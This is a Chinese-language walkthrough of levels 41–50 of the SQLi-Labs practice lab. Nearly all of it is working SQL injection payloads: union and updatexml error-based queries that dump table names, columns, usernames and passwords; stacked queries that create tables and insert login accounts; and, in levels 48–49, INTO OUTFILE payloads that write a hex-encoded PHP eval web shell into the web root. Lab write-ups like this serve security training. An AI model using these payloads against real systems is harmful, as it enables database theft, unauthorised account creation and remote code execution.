SQL-LIBS 41-50通关过程

第41关

爆库
http://www.guiltyfet.com/sqli/Less-41/?id=0 union%20select 1,version(),database() %23
1
2

爆表
http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
1
2

爆字段
http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
1
2

爆密码
http://www.guiltyfet.com/sqli/Less-41/?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
1
2

第42关

密码处的报错注入
-1’ union select 1,database(),3#

利用password来注入，新建表用户名随意填写，密码如下

a’;create table guiltyfet like users;#

1’;insert into users(id,username,password) values(42,‘guiltyfet42’,‘guiltyfet42’)#

可以简写：1’;insert into users values(42,‘guiltyfet42’,‘guiltyfet42’)#

成功登录

第43关

和上一关一样

1’);insert into users values(43,‘Less43’,‘Less43’)#

第44关

1’;insert into users values (‘44’,‘less44’,‘guiltyfet44’)#

第45关

1’);insert into users(id,username,password) values(45,‘guiltyfet45’,‘guiltyfet45’)#

第46关

Please input parameter as SORT with numeric value

sort=1时是第一列Id
sort=2时是第二列 username
sort=3时是第三列 password
当sort=4时报错
相当于使用order by作为判断字段数

利用报错注入
爆库
http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)--+
1
2
3

表
http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

1
2
3

查看users表下的所有字段
http://www.guiltyfet.com/sqli/Less-46/?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

1
2
3

查看username,password字段下的所有值
http://www.guiltyfet.com/sqli/Less-46/?sort=1 and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+
1
2

第47关

和46关一样加个’

http://www.guiltyfet.com/sqli/Less-47/?sort=1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from security.users),0x7e),1)--+
1

获得数据库版本
http://www.guiltyfet.com/sqli/Less-47/?sort=1’and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)–+

第48关

?sort=1 into outfile “D:\phpstudy_pro\WWW\www.guiltyfet.com\sqli\Less-48\test.php” lines terminated by 0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

报错了但是成功写入

其中lines terminates by将每行以指定字符串结尾：

0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e = hex(<?php eval($_POST["cmd"]);?>)
1
2
3

http://www.guiltyfet.com/sqli/Less-48/123.php

第49关

http://www.guiltyfet.com/sqli/Less-49/?sort=1%27into%20outfile%20%22D:\\phpstudy_pro\\WWW\\www.guiltyfet.com\\sqli\\Less-49\\149.php%22%20lines%20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+
1

第50关

http://www.guiltyfet.com/sqli/Less-50/?sort=1;insert into users(id,username,password) values(50,‘guiltyfet50’,‘guiltyfet50’)#

http://www.guiltyfet.com/sqli/Less-50/?sort=1